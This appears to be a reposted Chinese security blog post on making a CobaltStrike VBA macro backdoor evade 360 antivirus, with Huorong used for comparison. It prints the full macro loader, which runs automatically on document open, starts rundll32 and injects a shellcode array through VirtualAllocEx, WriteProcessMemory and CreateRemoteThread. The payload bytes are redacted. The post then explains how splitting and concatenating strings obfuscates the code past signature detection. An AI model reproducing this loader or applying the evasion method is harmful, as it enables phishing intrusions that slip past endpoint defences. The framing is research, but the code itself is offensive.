本次所涉及的杀毒软件主要为 360,辅助对比使用的是火绒。
我们本篇文章为了验证结果,主要针对 CobaltStrike 所生成的 vbs 宏代码来进行免杀测试,但实际上就目前杀软的查杀效果,利用CobaltStrike 的原生宏代码来进行钓鱼攻击显然不是一种方便的选择。因为vbs非常的强大以及灵活,完全可以依靠其他方式实现CobaltStrike 以及其他众多远控工具的上线操作,而且还可以拓展更多的模块。
注意:本文不会披露免杀程序,只提供测试思路,希望对各位后续探索新免杀方式提供参考依据。
先看下常规情况下的 cs vbs 后门在 360 查杀中的检测情况。
后门代码
Private Type PROCESS_INFORMATIONhProcess As Long hThread As Long dwProcessId As Long dwThreadId As LongEnd TypePrivate Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type#If VBA7 ThenPrivate Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtrPrivate Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtrPrivate Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtrPrivate Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#ElsePrivate Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID AsLong) As LongPrivate Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess AsLong, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPrivate Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As LongPrivate Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #End IfSub Auto_Open()Dim myByte As Long, myArray As Variant, offset As LongDim pInfo As PROCESS_INFORMATIONDim sInfo As STARTUPINFODim sNull As StringDim sProc As String#If VBA7 ThenDim rwxpage As LongPtr, res As LongPtr#ElseDim rwxpage As Long, res As Long#End If myArray = Array(xxx,xxxx,xxxx,xxx)If Len(Environ("ProgramW6432")) > 0 Then sProc = Environ("windir") & "\SysWOW64\rundll32.exe"Else sProc = Environ("windir") & "\System32\rundll32.exe" End Ifres = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo,pInfo)rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)For offset = LBound(myArray) To UBound(myArray) myByte = myArray(offset)res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)Next offsetres = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)End SubSub AutoOpen()Auto_OpenEnd SubSub Workbook_Open() Auto_OpenEnd Sub
代码中的 myArray 变量值已经被我删掉了,防止有人拿我的 CS 搞事情。
CS 的宏代码采用的就是最简单的 CreateRemoteThread 方式进行进程注入,使用的是这四个 API 接口。
CreateRemoteThread 、 VirtualAllocEx 、WriteProcessMemory、CreateProcessA使用 360 单独针对这四个接口进行查杀发现可以通过检测
将上面声明变量的部分加进去再去查杀,也是通过。
这里使用火绒对比查杀一下,火绒的查杀点在于上述 4 个 windows 接口,所以这段代码是能查杀出病毒的。
回到 360 上,以上代码均不会被查杀出后门,那么就测试后半部分。
单独查杀后半部分代码也不存在病毒,那推断就是针对全局代码进行关键特征提取来判断是否为病毒文件,那么只需要将特征完全去除掉即可。
在 vbs 中有以下几个特殊符号的用法:
_ 将一行代码变为两行: 将两行代码变为一行+ 将两个字符串拼接成一个字符串‘ 单行注释这里通过基础的混淆来演示一下 vbs 语法的丰富程度原本的代码
混淆后的代码,可以通过这种方式替换常规后门 vbs 代码中的特征字符。
当然可以构造更加复杂的 payload
我们查看下混淆后的最终查杀效果。
原文始发于微信公众号(白帽子社区团队):VBS后门的免杀方式的研究
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论